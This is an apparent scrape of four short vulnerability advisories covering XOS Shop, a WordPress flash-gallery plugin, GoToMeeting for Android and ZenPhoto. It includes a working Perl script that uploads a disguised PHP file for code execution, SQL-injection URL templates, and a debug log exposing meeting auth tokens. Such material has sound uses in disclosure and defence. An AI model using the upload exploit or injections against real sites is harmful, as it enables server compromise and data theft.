XOS Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

XOS Shop 1.0 rc7o is vulnerable; other versions may also be affected. 

http://www.example.com/Xoshop/shop/redirect.php?action=url&goto=[SQLI]
HireHackking 
source: https://www.securityfocus.com/bid/65060/info

The Global Flash Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

#! /usr/bin/perl
  use LWP;
  use HTTP::Request::Common;
  
  my ($url, $file) = @ARGV;
  
  my $ua = LWP::UserAgent->new();
  my $req = POST $url,
    Content_Type => 'form-data',
    Content =>    [
  name => $name,
  galleryselect => 1, # Gallery ID (popup.php)
  Filedata => [ "$file", "file.php.gif",  Content_Type =>
  'image/gif' ]
            ];
  my $res = $ua->request( $req );
  if( $res->is_success ) {
    print $res->content;
  } else {
    print $res->status_line, "\n";
  }

--------------------
Example URI:
--------------------
http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php
HireHackking 
source: https://www.securityfocus.com/bid/65123/info

GoToMeeting for Android is prone to multiple local information-disclosure vulnerabilities.

Local attackers can exploit these issues to obtain sensitive information, which may aid in further attacks.

GoToMeeting 5.0.799.1238 is vulnerable; other versions may also be affected. 

<! ----- SNIPPET ------- !>

D/G2M     (32190): HttpRequest to: 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
E/qcom_sensors_hal(  787): hal_process_report_ind: Bad item quality: 11 
D/dalvikvm(32190): GC_CONCURRENT freed 1322K, 43% free 20491K/35456K, paused 6ms+1ms, total 33ms
D/G2M     (32190): HttpRequest response from: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
 -> 200
D/G2M     (32190): HttpRequest response body: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]
 -> {"Status":"Redirect","RedirectHost":"www1.gotomeeting.com","MeetingId":"[MEETING_ID_REDACTED]"}
D/G2M     (32190): Got 302 from legacy JSON API: www1.gotomeeting.com
D/G2M     (32190): HttpRequest to: 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED]
D/G2M     (32190): HttpRequest response from: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] -> 200
D/G2M     (32190): HttpRequest response body: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED] -> 
{"Status":"MeetingNotStarted","MeetingId":"[MEETING_ID_REDACTED]","IsRecurring":false,"Endpoints":["Native"],"OrganizerName":"[REDACTED]","Subject":"[REDACTED]","MaxAttendees":100,"IsWebinar":false,"AudioParameters":{"CommParams":{"disableUdp":false},"ConferenceParams":{"supportedModes":"VoIP,PSTN,Private","initialMode":"Hybrid","SpeakerInfo":{"PhoneInfo":[{"description":"Default","number":"[REDACTED],"authToken":"AAFe4rYexu4Dm7qrL45/Egx+AAAAAFLdeSkAAAAAUt7KqUbWYmXH3OcczkhGaWRf0wM2OKWa","accessCode":"REDACTED"},"userId":"userId","authToken":"EAEBAQEBAQEBAQEBAQEBAQE=","privateMessage":"","audioKey":-1,"BridgeMutingControl":true,"VCBParams":{"Codec":[{"payloadType":103,"frameLength":30,"name":"ISAC","bitrate":32000,"channels":1,"samplingRate":16000},{"payloadType":0,"frameLength":20,"name":"PCMU","bitrate":64000,"ch
 
annels":1,"samplingRate":8000}],"VCB":{"port":5060,"ipAddr":"10.23.70.151"},"Options":{"asUpdates":true,"rtUpdates":true,"dtx":false}}}},"EndTime":1390239900000,"StartTime":1390237200000,"IsImpromptu":false}
D/G2M     (32190): Got response from legacy JSON API: 200
D/G2M     (32190): JoinService: Attempting to join Meeting
D/G2M     (32190): MeetingService: Starting Meeting join on legacy...
D/G2M     (32190): HttpRequest to: 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
D/G2M     (32190): ServiceResolver: COLService: BaseURL [https://www.example.com], isLegacy [true}, isWebinar 
[false]
D/G2M     (32190): HttpRequest response from: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
 -> 302
D/G2M     (32190): HttpRequest response body: GET 
https://www.example.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.com&android=true&MeetingID=[MEETING_ID_REDACTED]&PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
 -> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<! ----- SNIPPET ------- !>
HireHackking 
source: https://www.securityfocus.com/bid/65126/info

ZenPhoto is prone to an SQL-injection vulnerability and multiple path-disclosure vulnerabilities.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The attacker may gain access to potentially sensitive information that can aid in other attacks.

ZenPhoto 1.4.4 is vulnerable; other versions may also be affected. 

http://www.example.com/zenphoto/index.php?p=search&date=[SQL Injection]